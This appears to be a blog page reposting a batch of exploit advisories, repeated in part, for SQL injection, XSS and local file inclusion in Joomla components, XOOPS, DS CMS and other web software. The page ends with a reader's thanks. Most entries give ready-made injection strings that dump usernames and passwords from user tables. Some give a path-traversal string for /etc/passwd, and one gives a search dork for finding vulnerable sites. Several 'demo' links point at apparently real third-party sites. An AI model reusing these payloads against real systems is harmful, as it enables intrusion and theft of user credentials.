Joomla StaticXT SQL Injection
===================================================
Joomla Component (com_staticxt) SQL Injection Vulnerability
===================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
[+] ExploiT :
union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
jos_users--
[+] G00gle Dork : :S
[+] Example :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
===================================================
Onurlu Olmak Bir Ömür Sürer Artistlik Ise One Minute
===================================================
Greetz : 1923Turk All Users
===================================================
Joomla Component (com_spa) SQL Injection Vulnerability
===================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
[+] ExploiT :
-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
===================================================
I Love You Joomla :))
===================================================
Greetz : 1923Turk All Users
CMS by MyWorks Multiple Vulnerabilities
========================================================
CMS by MyWorks SQL/ XSS Vulnerability ======================================================== Author : Palyo34 Home : www.1923Turk.com Script : CMS by MyWorks Script site: http://www.myworks.spb.ru/ ======================================================= ===[ Exploit ]=== http://server/catalog/good.php?good_id= SQL INJECTION 1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 Demo: http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 ======================================================= ===[XSS Vulnerability]=== http://server/catalog/good.php?good_id= http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> ========================================================
JavaPont Local File Inclusion
=========================== JavaPont SQL Injection LFI Vulnerability =========================== Author : Palyo34 Homepage : http://www.1923turk.com =========================== [ Vulnerable File ] index.php?module=search&q= [ XpL ] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd [ Demo] http://www.javapont.hu/index.php?module=search&q=../../../../../../../../../../../../../../../etc/passwd ============================
XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
=========================================== XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability XOOPS Version: XOOPS 2.0.18 http://www.xoops.org/modules/repository/ =========================================== AUTHOR : Palyo34 HOME : http://www.1923turk.biz =========================================== DORK : allinurl: "modules/dictionary/detail.php?id" =========================================== EXPLOIT : modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users-- ===========================================
Joomla Component com_job ( showMoreUse) SQL injection vulnerability
================================================================ [!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability [!] Author : Palyo34 [!] Homepage: http://www.1923turk.biz [!] Date : 12 08, 2009 ================================================================ 7 KAHRAMAN SEHIDIMIZI SAYGIYLA ANIYORUZ.ALLAH (C.C.) RAHMET EYLESIN ================================================================ http://server/index.php?option=com_job&task=showMoreUser&id=[SQL] [ Exploit ] index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users-- [ Demo ] http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users-- =================================================================
CMS By MyWorks SQL Injection / Cross Site Scripting
========================================================
CMS by MyWorks SQL/ XSS Vulnerability
========================================================
Author : Palyo34
Home : www.1923Turk.com
Script : CMS by MyWorks
Script site: http://www.myworks.spb.ru/
========================================================
===[ Exploit ]===
http://server/catalog/good.php?good_id= SQL INJECTION
1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
Demo:
http://happyday-spb.ru/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
===[XSS Vulnerability]===
http://server/catalog/good.php?good_id=
http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>
========================================================
DS CMS 1.0 SQL Injection
======================================================= DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability ======================================================= AUTHOR : Palyo34 HOME : http://www.1923turk.biz Script site : http://cms.dsinternal.com/Home ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= ### exploit ### http://server/path/pfNewsDetail.php?NewsId=[SQL] ### Example### -1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info-- =======================================================
===================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
[+] ExploiT :
-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
===================================================
I Love You Joomla :))
===================================================
Greetz : 1923Turk All Users
CMS by MyWorks Multiple Vulnerabilities
========================================================
CMS by MyWorks SQL/ XSS Vulnerability ======================================================== Author : Palyo34 Home : www.1923Turk.com Script : CMS by MyWorks Script site: http://www.myworks.spb.ru/ ======================================================= ===[ Exploit ]=== http://server/catalog/good.php?good_id= SQL INJECTION 1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 Demo: http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12 ======================================================= ===[XSS Vulnerability]=== http://server/catalog/good.php?good_id= http://server/catalog/good.php?good_id=164<script>alert("XSS")</script> ========================================================
JavaPont Local File Inclusion
=========================== JavaPont SQL Injection LFI Vulnerability =========================== Author : Palyo34 Homepage : http://www.1923turk.com =========================== [ Vulnerable File ] index.php?module=search&q= [ XpL ] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd [ Demo] http://www.javapont.hu/index.php?module=search&q=../../../../../../../../../../../../../../../etc/passwd ============================
XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
=========================================== XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability XOOPS Version: XOOPS 2.0.18 http://www.xoops.org/modules/repository/ =========================================== AUTHOR : Palyo34 HOME : http://www.1923turk.biz =========================================== DORK : allinurl: "modules/dictionary/detail.php?id" =========================================== EXPLOIT : modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users-- ===========================================
Joomla Component com_job ( showMoreUse) SQL injection vulnerability
================================================================ [!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability [!] Author : Palyo34 [!] Homepage: http://www.1923turk.biz [!] Date : 12 08, 2009 ================================================================ 7 KAHRAMAN SEHIDIMIZI SAYGIYLA ANIYORUZ.ALLAH (C.C.) RAHMET EYLESIN ================================================================ http://server/index.php?option=com_job&task=showMoreUser&id=[SQL] [ Exploit ] index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users-- [ Demo ] http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users-- =================================================================
CMS By MyWorks SQL Injection / Cross Site Scripting
========================================================
CMS by MyWorks SQL/ XSS Vulnerability
========================================================
Author : Palyo34
Home : www.1923Turk.com
Script : CMS by MyWorks
Script site: http://www.myworks.spb.ru/
========================================================
===[ Exploit ]===
http://server/catalog/good.php?good_id= SQL INJECTION
1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
Demo:
http://happyday-spb.ru/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
===[XSS Vulnerability]===
http://server/catalog/good.php?good_id=
http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>
========================================================
DS CMS 1.0 SQL Injection
======================================================= DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability ======================================================= AUTHOR : Palyo34 HOME : http://www.1923turk.biz Script site : http://cms.dsinternal.com/Home ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= ### exploit ### http://server/path/pfNewsDetail.php?NewsId=[SQL] ### Example### -1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info-- =======================================================
Paşam kimse yorumda atmamış çok güzel paylaşım bunlar elleriniz dert görmesin
YanıtlaSil